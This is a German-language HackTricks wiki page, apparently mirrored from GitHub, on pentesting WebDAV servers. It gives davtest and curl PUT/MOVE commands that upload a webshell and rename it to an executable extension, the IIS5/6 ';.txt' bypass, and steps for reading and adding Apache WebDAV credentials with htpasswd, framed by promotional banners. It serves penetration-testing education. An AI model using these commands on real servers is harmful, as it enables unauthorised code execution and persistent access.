mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 21:24:06 +00:00
130 lines
8 KiB
Markdown
130 lines
8 KiB
Markdown
# WebDav
|
|
|
|
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Verwenden Sie [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav), um **Workflows zu erstellen und zu automatisieren**, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.\
|
|
Heute Zugriff erhalten:
|
|
|
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
|
|
|
|
<details>
|
|
|
|
<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
|
|
|
|
</details>
|
|
|
|
Beim Umgang mit einem **HTTP-Server mit aktiviertem WebDav** ist es möglich, Dateien zu **manipulieren**, wenn Sie über die richtigen **Anmeldeinformationen** verfügen, die in der Regel über die **HTTP-Basisauthentifizierung** überprüft werden. Die Kontrolle über einen solchen Server zu erlangen, beinhaltet oft das **Hochladen und Ausführen einer Webshell**.
|
|
|
|
Der Zugriff auf den WebDav-Server erfordert in der Regel **gültige Anmeldeinformationen**, wobei [**WebDav-Brute-Force**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) eine häufige Methode ist, um sie zu erhalten.
|
|
|
|
Um Beschränkungen bei Datei-Uploads zu überwinden, insbesondere solche, die die Ausführung von serverseitigen Skripten verhindern, könnten Sie:
|
|
|
|
* Dateien mit **ausführbaren Erweiterungen** direkt hochladen, wenn sie nicht eingeschränkt sind.
|
|
* Umbenennen von hochgeladenen nicht ausführbaren Dateien (wie .txt) in eine ausführbare Erweiterung.
|
|
* Kopieren von hochgeladenen nicht ausführbaren Dateien und Ändern ihrer Erweiterung in eine ausführbare Erweiterung.
|
|
|
|
## DavTest
|
|
|
|
**Davtest** versucht, **mehrere Dateien mit verschiedenen Erweiterungen hochzuladen** und zu **überprüfen**, ob die Erweiterung **ausgeführt wird**:
|
|
```bash
|
|
davtest [-auth user:password] -move -sendbd auto -url http://<IP> #Uplaod .txt files and try to move it to other extensions
|
|
davtest [-auth user:password] -sendbd auto -url http://<IP> #Try to upload every extension
|
|
```
|
|
![](<../../.gitbook/assets/image (851).png>)
|
|
|
|
Das bedeutet nicht, dass **.txt**- und **.html-Erweiterungen ausgeführt werden**. Dies bedeutet, dass Sie auf diese Dateien **über das Web zugreifen** können.
|
|
|
|
## Cadaver
|
|
|
|
Sie können dieses Tool verwenden, um sich mit dem WebDav-Server zu **verbinden** und Aktionen (wie **Hochladen**, **Verschieben** oder **Löschen**) **manuell** durchzuführen.
|
|
```
|
|
cadaver <IP>
|
|
```
|
|
## PUT-Anfrage
|
|
```
|
|
curl -T 'shell.txt' 'http://$ip'
|
|
```
|
|
## MOVE-Anforderung
|
|
```
|
|
curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt'
|
|
```
|
|
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Verwenden Sie [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav), um einfach **Workflows zu erstellen** und zu **automatisieren**, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.\
|
|
Heute Zugriff erhalten:
|
|
|
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
|
|
|
|
## IIS5/6 WebDav-Schwachstelle
|
|
|
|
Diese Schwachstelle ist sehr interessant. Der **WebDav** erlaubt es **nicht**, Dateien mit der Erweiterung **.asp** hochzuladen oder umzubenennen. Aber Sie können dies **umgehen**, indem Sie am Ende des Namens **";.txt"** hinzufügen und die Datei wird **ausgeführt**, als ob es eine .asp-Datei wäre (Sie könnten auch **".html" anstelle von ".txt"** verwenden, aber **vergessen Sie das ";" nicht**).
|
|
|
|
Dann können Sie Ihre Shell als ".**txt-Datei**" hochladen und sie in eine ".asp;.txt-Datei" **kopieren/verschieben**. Wenn Sie auf diese Datei über den Webserver zugreifen, wird sie **ausgeführt** (cadaver wird sagen, dass die Verschiebeaktion nicht funktioniert hat, aber das hat sie).
|
|
|
|
![](<../../.gitbook/assets/image (1092).png>)
|
|
|
|
## Post-Credentials
|
|
|
|
Wenn der Webdav einen Apache-Server verwendet, sollten Sie die konfigurierten Websites in Apache überprüfen. Üblicherweise:\
|
|
_**/etc/apache2/sites-enabled/000-default**_
|
|
|
|
Darin könnten Sie etwas wie:
|
|
```
|
|
ServerAdmin webmaster@localhost
|
|
Alias /webdav /var/www/webdav
|
|
<Directory /var/www/webdav>
|
|
DAV On
|
|
AuthType Digest
|
|
AuthName "webdav"
|
|
AuthUserFile /etc/apache2/users.password
|
|
Require valid-user
|
|
```
|
|
Wie Sie sehen können, gibt es die Dateien mit den gültigen **Anmeldedaten** für den **WebDAV**-Server:
|
|
```
|
|
/etc/apache2/users.password
|
|
```
|
|
Innerhalb dieser Art von Dateien finden Sie den **Benutzernamen** und einen **Hash** des Passworts. Dies sind die Anmeldeinformationen, die der WebDAV-Server verwendet, um Benutzer zu authentifizieren.
|
|
|
|
Sie können versuchen, sie zu **knacken**, oder **weitere hinzufügen**, wenn Sie aus irgendeinem Grund auf den **WebDAV**-Server **zugreifen** möchten:
|
|
```bash
|
|
htpasswd /etc/apache2/users.password <USERNAME> #You will be prompted for the password
|
|
```
|
|
Um zu überprüfen, ob die neuen Anmeldedaten funktionieren, können Sie Folgendes tun:
|
|
```bash
|
|
wget --user <USERNAME> --ask-password http://domain/path/to/webdav/ -O - -q
|
|
```
|
|
## Referenzen
|
|
|
|
* [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
|
|
|
|
<details>
|
|
|
|
<summary><strong>Erlernen Sie AWS-Hacking von Null auf Held mit</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Andere Möglichkeiten, HackTricks zu unterstützen:
|
|
|
|
* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)!
|
|
* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com)
|
|
* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.
|
|
|
|
</details>
|
|
|
|
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
|
|
|
\
|
|
Verwenden Sie [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav), um mühelos **Workflows zu erstellen und zu automatisieren**, die von den weltweit **fortschrittlichsten** Community-Tools unterstützt werden.\
|
|
Heute Zugriff erhalten:
|
|
|
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
|